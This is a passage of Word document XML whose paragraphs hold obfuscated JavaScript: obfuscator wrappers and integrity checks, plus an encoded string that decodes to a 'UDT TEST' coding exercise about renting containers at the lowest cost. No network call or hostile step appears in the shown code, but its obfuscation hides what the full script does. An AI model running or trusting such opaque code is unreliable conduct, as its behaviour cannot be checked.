    <w:p w14:paraId="7458818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    })();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026F378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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1CAC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDDA0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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861973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if (_0x4cbefe) return _0x25e278;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2983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else StTLTQ['bP' + 'FH' + 'N'](_0x1fbc16, -0xaa5 + 0x255b + -0x1ab6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC6F05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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE27F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} : function() {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F448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return _0x4b763e = ![], _0x8c1739;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05ED0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} else xNwRvt['QI' + 'rc' + 's'](_0x3c1036);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462FF8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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1E40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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC53E9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}()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF68E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_0x344f05 = _0x312600['Vs' + 'jf' + 'H'](_0x2a99fe, this, function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468EA7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if (_0x312600['pi' + 'Ka' + 'q'](_0x312600['yo' + 'hZ' + 'H'], _0x312600['LT' + 'RB' + 'T'])) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6E08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else return _0x344f05['to' + 'St' + 'ri' + 'ng']()['se' + 'ar' + 'ch'](_0x312600['As' + 'sT' + 'm'])['to' + 'St' + 'ri' + 'ng']()['co' + 'ns' + 'tr' + 'uc' + 'to' + 'r'](_0x344f05)['se' + 'ar' + 'ch'](_0x312600['As' + 'sT' + 'm']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511191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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDB84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_0x312600['Sa' + 'hS' + 'u'](_0x344f05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F93DCC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const _0x515620 = (function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A903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const _0x1eb0d1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB95D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'DuzCN': _0x312600['As' + 'sT' + 'm'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193FA58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'XDFvo': function(_0x3b3731, _0x598eb7) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF13A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            return _0x312600['fu' + 'IB' + 'J'](_0x3b3731, _0x598eb7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260AF3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022E1BB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'uAKPF': _0x312600['Xe' + 'Nz' + 'y'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9C30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'DRTQH': _0x312600['cq' + 'yn' + 'n'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC8A7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'ZGJMf': _0x312600['GG' + 'wC' + 'b'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88BF5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'gNdJP': _0x312600['iP' + 'HB' + 'B'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35202FD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'urFba': function(_0x1bfaf3, _0x185479) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8F5E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_0x312600['aX' + 'Wp' + 'r'](_0x1bfaf3, _0x185479);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F20E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607DD9F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'kwJnq': _0x312600['PL' + 'Qf' + 'o'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571EC9D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'MKUfY': _0x312600['yj' + 'oK' + 'K'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53322E6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'eZeXd': _0x312600['jX' + 'cj' + 'O'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472ACB1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'aKmTl': function(_0x16ec16, _0x166768) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBEB2A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_0x312600['aX' + 'Wp' + 'r'](_0x16ec16, _0x166768);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D8CDC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555BBAC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'pFXsa': _0x312600['Kq' + 'ey' + 'V'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18B8C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'VuGwm': function(_0x5e7853, _0x30ece9) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74D63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_0x312600['IK' + 'zO' + 'l'](_0x5e7853, _0x30ece9);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B2A3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159E595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'yxNhY': _0x312600['nT' + 'Qr' + 'J'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D639A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'HbHAz': _0x312600['jN' + 'PC' + 'q']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E3D0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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727A6C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if (_0x312600['Fz' + 'df' + 's'](_0x312600['On' + 'Ie' + 'w'], _0x312600['Wg' + 'dm' + 'B'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173628D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let _0x49ef2d = !![];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C88B7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return function(_0x53ec49, _0x9affae) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9ABD7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const _0x14ccca = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62DC9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'MaxUy': function(_0x192294, _0x81a09) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B5515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return _0x1eb0d1['ur' + 'Fb' + 'a'](_0x192294, _0x81a09);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE513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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7DB5D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'paSgq': _0x1eb0d1['kw' + 'Jn' + 'q'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6E32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'ixTJD': _0x1eb0d1['MK' + 'Uf' + 'Y'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3569B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                'DvAHN': _0x1eb0d1['eZ' + 'eX' + 'd'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422693A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'MWNIJ': function(_0x23307d, _0x22e432) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB9AF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return _0x1eb0d1['aK' + 'mT' + 'l'](_0x23307d, _0x22e432);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7547D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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51762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'FCgwe': _0x1eb0d1['pF' + 'Xs' + 'a']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E330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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C682EE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if (_0x1eb0d1['Vu' + 'Gw' + 'm'](_0x1eb0d1['yx' + 'Nh' + 'Y'], _0x1eb0d1['Hb' + 'HA' + 'z'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DBC62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const _0x1c203e = _0x49ef2d ? function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CD00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const _0x1550d2 = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD4A56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_0x1550d2['gm' + 'Mz' + 'k'] = _0x1eb0d1['Du' + 'zC' + 'N'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADA67F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const _0x11d36a = _0x1550d2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D338C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if (_0x1eb0d1['XD' + 'Fv' + 'o'](_0x1eb0d1['uA' + 'KP' + 'F'], _0x1eb0d1['DR' + 'TQ' + 'H'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3555F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if (_0x9affae) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02310AA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if (_0x1eb0d1['XD' + 'Fv' + 'o'](_0x1eb0d1['ZG' + 'JM' + 'f'], _0x1eb0d1['gN' + 'dJ' + 'P'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E727B9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const _0x5de398 = _0x9affae['ap' + 'pl' + 'y'](_0x53ec49, arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD12C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    return _0x9affae = null, _0x5de398;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7080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} else return _0xafdeef['to' + 'St' + 'ri' + 'ng']()['se' + 'ar' + 'ch'](UUWLcC['gm' + 'Mz' + 'k'])['to' + 'St' + 'ri' + 'ng']()['co' + 'ns' + 'tr' + 'uc' + 'to' + 'r'](_0x2f8064)['se' + 'ar' + 'ch'](UUWLcC['gm' + 'Mz' + 'k']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AFDC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36BF5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} else(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56623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return !![];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C029F0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} ['co' + 'ns' + 'tr' + 'uc' + 'to' + 'r'](ZyFygu['Ma' + 'xU' + 'y'](ZyFygu['pa' + 'Sg' + 'q'], ZyFygu['ix' + 'TJ' + 'D']))['ca' + 'll'](ZyFygu['Dv' + 'AH' + 'N']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B176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} : function() {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE623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return _0x49ef2d = ![], _0x1c203e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696A21F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 else(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A58F4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return ![];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157606B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            } ['co' + 'ns' + 'tr' + 'uc' + 'to' + 'r'](ZyFygu['MW' + 'NI' + 'J'](ZyFygu['pa' + 'Sg' + 'q'], ZyFygu['ix' + 'TJ' + 'D']))['ap' + 'pl' + 'y'](ZyFygu['FC' + 'gw' + 'e']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB3F6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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEBB4A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 else pFNsum['ub' + 'Bt' + 'z'](_0x2f8373, 0x367 + -0x1edd * 0x1 + 0x172 * 0x13);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F002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}());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634BD1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(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70460F5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const _0x1e351d = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC65D9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'CVMBT': function(_0x553488, _0x4a2907) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701F2B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_0x312600['pX' + 'Vc' + 'm'](_0x553488, _0x4a2907);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9A73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33215E3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'rIFTg': _0x312600['Xx' + 'SU' + 'i'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222877B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'CIMwF': _0x312600['xD' + 'Ae' + 'M'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05866EF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'MHgeC': _0x312600['Jx' + 'pn' + 'Y'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115CDE3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'FsuqF': _0x312600['Vq' + 'uu' + 'Q'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6AD7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'Asfsg': function(_0x3018f7, _0x3e5cc0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF8956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_0x312600['BB' + 'aa' + 'D'](_0x3018f7, _0x3e5cc0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D876F1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4FBDE92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'aXuZf': _0x312600['Jk' + 'uj' + 'H'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6335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'dOuvA': function(_0x5867bd, _0x6d2459) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C76F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_0x312600['aX' + 'Wp' + 'r'](_0x5867bd, _0x6d2459);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C737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49275E1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'mPHFW': _0x312600['vX' + 'Qq' + 'V'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0652B1B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'BzcFj': _0x312600['HX' + 'UT' + 's'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D77926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'vmFEY': _0x312600['xB' + 'VI' + 'c'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37DDE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'dNZFl': _0x312600['YQ' + 'hz' + 'B'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D49672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'dyPla': function(_0x34d0dd, _0x5b0987) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407E4E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_0x312600['BB' + 'aa' + 'D'](_0x34d0dd, _0x5b0987);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5CE6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342D419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'XzaEj': function(_0x422b5e, _0x503955) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473AA38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_0x312600['Ht' + 'wN' + 'J'](_0x422b5e, _0x503955);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9FA80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1AFD699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        'fQYLY': _0x312600['Vg' + 'SL' + 'Z'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C95C7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'ndDOO': function(_0x4e7e9a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC1B9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_0x312600['Sa' + 'hS' + 'u'](_0x4e7e9a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA4C3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A98D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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A467F9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if (_0x312600['Ht' + 'wN' + 'J'](_0x312600['ph' + 'ht' + 'A'], _0x312600['ph' + 'ht' + 'A'])) _0x312600['Vs' + 'jf' + 'H'](_0x515620, this, function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99BDF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if (_0x1e351d['CV' + 'MB' + 'T'](_0x1e351d['rI' + 'FT' + 'g'], _0x1e351d['CI' + 'Mw' + 'F'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A6F9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const _0x2ab07c = new RegExp(_0x1e351d['MH' + 'ge' + 'C']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47380E8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_0x52d8f8 = new RegExp(_0x1e351d['Fs' + 'uq' + 'F'], 'i'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91677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_0xaa3e62 = _0x1e351d['As' + 'fs' + 'g'](a0_0x4ea09f, _0x1e351d['aX' + 'uZ' + 'f']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B430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if (!_0x2ab07c['te' + 'st'](_0x1e351d['dO' + 'uv' + 'A'](_0xaa3e62, _0x1e351d['mP' + 'HF' + 'W'])) || !_0x52d8f8['te' + 'st'](_0x1e351d['dO' + 'uv' + 'A'](_0xaa3e62, _0x1e351d['Bz' + 'cF' + 'j']))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59884F7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if (_0x1e351d['CV' + 'MB' + 'T'](_0x1e351d['vm' + 'FE' + 'Y'], _0x1e351d['dN' + 'ZF' + 'l'])) _0x1e351d['dy' + 'Pl' + 'a'](_0xaa3e62, '0');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D913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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998385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const _0x4f9ece = _0x495441['ap' + 'pl' + 'y'](_0x554959, arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5D07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return _0x3f1109 = null, _0x4f9ece;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A8EC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913B78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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7474134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if (_0x1e351d['Xz' + 'aE' + 'j'](_0x1e351d['fQ' + 'YL' + 'Y'], _0x1e351d['fQ' + 'YL' + 'Y'])) _0x1e351d['nd' + 'DO' + 'O'](a0_0x4ea09f);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241459D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else return ![];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC77F3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6879A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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16110F7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const _0x385761 = _0x1ec741 ? function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278AD01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if (_0x3d0b3d) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E2BB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const _0x5bc55d = _0x2281a2['ap' + 'pl' + 'y'](_0x40df68, arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF12A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                    return _0x32d5f3 = null, _0x5bc55d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A382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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87FFB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 : function() {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69CC0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_0x143a0a = ![], _0x385761;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C4D30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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE08D1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})();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A913AC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else return _0x5a7ebe;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089414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}());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C994DB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if (!process) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046CC3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if (_0x312600['Ht' + 'wN' + 'J'](_0x312600['UN' + 'Ft' + 'H'], _0x312600['UN' + 'Ft' + 'H'])) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715C51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else return !![];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937763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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE50C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const _0x604f59 = '\x0a\x20' + '\x20\x20' + '\x20W' + 'EL' + 'CO' + 'ME' + '\x20T' + 'O\x20' + 'UD' + 'T\x20' + 'TE' + 'ST' + ',\x20' + 'TR' + 'Y\x20' + 'AL' + 'L\x20' + 'OF' + '\x20W' + 'HA' + 'T\x20' + 'YO' + 'U\x20' + 'CA' + 'N\x20' + 'DO' + '.\x0a' + '\x20\x20' + '\x20\x20' + 'If' + '\x20y' + 'ou' + '\x20n' + 'ee' + 'd\x20' + 'a\x20' + 'pd' + 'f\x20' + 've' + 'rs' + 'io' + 'n,' + '\x20p' + 'le' + 'as' + 'e\x20' + 'co' + 'nt' + 'ac' + 't\x20' + 'us' + '.\x0a' + '\x0a\x20' + '\x20\x20' + '\x20S' + 'EC' + 'TI' + 'ON' + '\x20I' + ':\x20' + 'Al' + 'go' + 'ri' + 'th' + 'm.' + '\x0a\x20' + '\x20\x20' + '\x201' + '.\x20' + 'A\x20' + 'lo' + 'gi' + 'st' + 'ic' + '\x20c' + 'om' + 'pa' + 'ny' + '\x20p' + 'la' + 'n\x20' + 'to' + '\x20r' + 'en' + 't\x20' + 'a\x20' + 'la' + 'rg' + 'e\x20' + 'am' + 'ou' + 'nt' + '\x20o' + 'f\x20' + 'em' + 'pt' + 'y\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20Y' + 'ou' + 'r\x20' + 'ta' + 'sk' + '\x20i' + 's\x20' + 'to' + '\x20d' + 'es' + 'ig' + 'n\x20' + 'an' + '\x20a' + 'lg' + 'or' + 'it' + 'hm' + '\x20t' + 'o\x20' + 'he' + 'lp' + '\x20l' + 'og' + 'is' + 'ti' + 'c\x20' + 'co' + 'mp' + 'an' + 'y\x20' + 'ab' + 'le' + '\x20t' + 'o\x20' + 're' + 'nt' + '\x20e' + 'no' + 'ug' + 'h\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'rs' + '\x20a' + 't\x20' + 'th' + 'e\x20' + 'lo' + 'we' + 'st' + '\x20p' + 'ri' + 'ce' + '.\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '+\x20' + 'Ca' + 'se' + '\x201' + ':\x20' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20I' + 'np' + 'ut' + ':\x20' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20c' + 'on' + 'st' + '\x20n' + 'ee' + 'de' + 'dC' + 'on' + 'ta' + 'in' + 'er' + '\x20=' + '\x203' + ';\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'ns' + 't\x20' + 'li' + 'st' + 'in' + 'gs' + '\x20=' + '\x20[' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20{' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20n' + 'am' + 'e:' + '\x20\x22' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20A' + '\x22,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ':\x20' + '1,' + </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">'\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20t' + 'ot' + 'al' + 'Co' + 'st' + ':\x20' + '1,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '{\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'na' + 'me' + ':\x20' + '\x22C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'B\x22' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r:' + '\x202' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'to' + 'ta' + 'lC' + 'os' + 't:' + '\x201' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '},' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20{' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20n' + 'am' + 'e:' + '\x20\x22' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20C' + '\x22,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ':\x20' + '3,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20t' + 'ot' + 'al' + 'Co' + 'st' + ':\x20' + '3,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '];' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20O' + 'ut' + 'pu' + 't:' + '\x20\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '[C' + 'on' + 'tr' + 'ac' + 't\x20' + 'wi' + 'th' + ']\x20' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20B' + '\x202' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ',\x20' + 'pr' + 'ic' + 'e:' + '\x201' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20[' + 'Co' + 'nt' + 'ra' + 'ct' + '\x20w' + 'it' + 'h]' + '\x20C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'A\x20' + '1\x20' + 'co' + 'nt' + 'ai' + ('ne' + 'r,' + '\x20p' + 'ri' + 'ce' + ':\x20' + '1\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '[S' + 'um' + 'ma' + 'ry' + ']\x20' + 'to' + 'ta' + 'l\x20' + 'co' + 'st' + '\x202' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20E' + 'xp' + 'la' + 'in' + ':\x20' + 'Th' + 'e\x20' + 'op' + 'ti' + 'ma' + 'l\x20' + 'pr' + 'ic' + 'e\x20' + 'is' + '\x20t' + 'o\x20' + 're' + 'nt' + '\x201' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + '\x20f' + 'ro' + 'm\x20' + 're' + 'nt' + 'er' + '\x20A' + '\x20a' + 'nd' + '\x202' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + 's\x20' + 'fr' + 'om' + '\x20r' + 'en' + 'te' + 'r\x20' + 'B,' + '\x20t' + 'he' + '\x20t' + 'ot' + 'al' + '\x20c' + 'os' + 't\x20' + 'of' + '\x20t' + 'he' + 'm\x20' + 'is' + '\x202' + '.\x20' + '(S' + 'am' + 'e\x20' + 'to' + 'ta' + 'l\x20' + 'co' + 'st' + '\x20b' + 'ut' + '\x20d' + 'if' + 'fe' + 're' + 'nt' + '\x20p' + 'ro' + 'vi' + 'de' + 'r\x20' + 'is' + '\x20a' + 'cc' + 'ep' + 'te' + 'd)' + '\x0a\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '+\x20' + 'Ca' + 'se' + '\x202' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'In' + 'pu' + 't:' + '\x20\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'ns' + 't\x20' + 'ne' + 'ed' + 'ed' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + '=\x20' + '10' + ';\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">'\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'ns' + 't\x20' + 'li' + 'st' + 'in' + 'gs' + '\x20=' + '\x20[' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20{' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20n' + 'am' + 'e:' + '\x20\x22' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20A' + '\x22,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ':\x20' + '5,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20t' + 'ot' + 'al' + 'Co' + 'st' + ':\x20' + '5,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '{\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 